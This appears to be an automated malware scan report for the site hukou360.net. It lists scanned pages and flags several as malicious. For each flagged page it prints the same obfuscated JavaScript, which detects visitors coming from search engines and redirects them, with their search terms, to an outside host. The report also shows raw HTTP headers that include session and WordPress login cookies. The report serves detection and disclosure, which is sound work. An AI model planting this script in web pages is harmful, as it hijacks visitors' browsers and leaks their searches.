Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hukou360.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hukou360.net/ | 200 OK Content-Length: 40958 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
| ||
http://s20.cnzz.com/stat.php?id=3999956&web_id=3999956&show=pic1 | 200 OK Content-Length: 9625 Content-Type: application/javascript | clean |
http://hukou360.net/friendlink | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 01 Apr 2014 19:21:20 GMT Pragma: no-cache Location: http://hukou360.net/friendlink/ Server: Apache Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=m7uq9206vfbmdin158i3kbnl21; path=/ Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589680%7Ca4a9c16e355a20b2da9b5251fb3ff0a2; expires=Tue, 15-Apr-2014 19:21:20 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589680%7Ca4a9c16e355a20b2da9b5251fb3ff0a2; expires=Tue, 15-Apr-2014 19:21:20 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589680%7C71a416f86612a9abd9683225524a25ac; expires=Tue, 15-Apr-2014 19:21:20 GMT; path=/; httponly X-Pingback: http://hukou360.net/xmlrpc.php | clean |
http://hukou360.net/friendlink/ | 200 OK Content-Length: 40067 Content-Type: text/html | clean |
http://hukou360.net/?page_id=2 | 200 OK Content-Length: 22038 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
| ||
http://hukou360.net/?page_id=6 | 200 OK Content-Length: 21054 Content-Type: text/html | clean |
http://hukou360.net/?page_id=33 | 200 OK Content-Length: 34643 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
| ||
http://hukou360.net/?page_id=21 | 200 OK Content-Length: 21361 Content-Type: text/html | clean |
http://hukou360.net/?page_id=8 | 200 OK Content-Length: 21146 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
| ||
http://hukou360.net/?page_id=11 | 200 OK Content-Length: 20289 Content-Type: text/html | clean |
http://hukou360.net/?page_id=82 | 200 OK Content-Length: 21219 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
| ||
http://hukou360.net/?page_id=61 | 200 OK Content-Length: 20722 Content-Type: text/html | clean |
http://hukou360.net/?page_id=157 | 200 OK Content-Length: 23757 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
| ||
http://hukou360.net/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 01 Apr 2014 19:21:30 GMT Pragma: no-cache Location: http://hukou360.net/test404page.js/ Server: Apache Content-Encoding: none Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=uk7cusjrf82am0rjlkjjnc7021; path=/ Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589690%7C917de03482c5dd32cd35427f545df050; expires=Tue, 15-Apr-2014 19:21:30 GMT; path=/wp-content/plugins; httponly Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589690%7C917de03482c5dd32cd35427f545df050; expires=Tue, 15-Apr-2014 19:21:30 GMT; path=/wp-admin; httponly Set-Cookie: wordpress_logged_in_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589690%7Cf73b967fe5ee0f61bf5cce875e6d2e6b; expires=Tue, 15-Apr-2014 19:21:30 GMT; path=/; httponly X-Pingback: http://hukou360.net/xmlrpc.php | clean |
http://hukou360.net/test404page.js/ | 200 OK Content-Length: 40937 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{})) Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hukou360.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Apr 2014 19:21:18 GMT
Pragma: no-cache
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=5a7hm5l8tqeog93mlo49lbe9v5; path=/
Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589678%7Cbe07c16b3920b78626a635d5cb08e8ad; expires=Tue, 15-Apr-2014 19:21:18 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589678%7Cbe07c16b3920b78626a635d5cb08e8ad; expires=Tue, 15-Apr-2014 19:21:18 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589678%7Cb7b59718369d65eed99a1c87cad27e4e; expires=Tue, 15-Apr-2014 19:21:18 GMT; path=/; httponly
X-Pingback: http://hukou360.net/xmlrpc.php
GET / HTTP/1.1
Host: hukou360.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 01 Apr 2014 19:21:18 GMT
Pragma: no-cache
Server: Apache
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=5a7hm5l8tqeog93mlo49lbe9v5; path=/
Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589678%7Cbe07c16b3920b78626a635d5cb08e8ad; expires=Tue, 15-Apr-2014 19:21:18 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589678%7Cbe07c16b3920b78626a635d5cb08e8ad; expires=Tue, 15-Apr-2014 19:21:18 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_c3e351f6e7b7c8a36c1b3c874caa73ab=%7C1397589678%7Cb7b59718369d65eed99a1c87cad27e4e; expires=Tue, 15-Apr-2014 19:21:18 GMT; path=/; httponly
X-Pingback: http://hukou360.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: hukou360.net
Referer: http://www.google.com/search?q=hukou360.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hukou360.net
Referer: http://www.google.com/search?q=hukou360.net
Result:
The result is similar to the first query. There are no suspicious redirects found.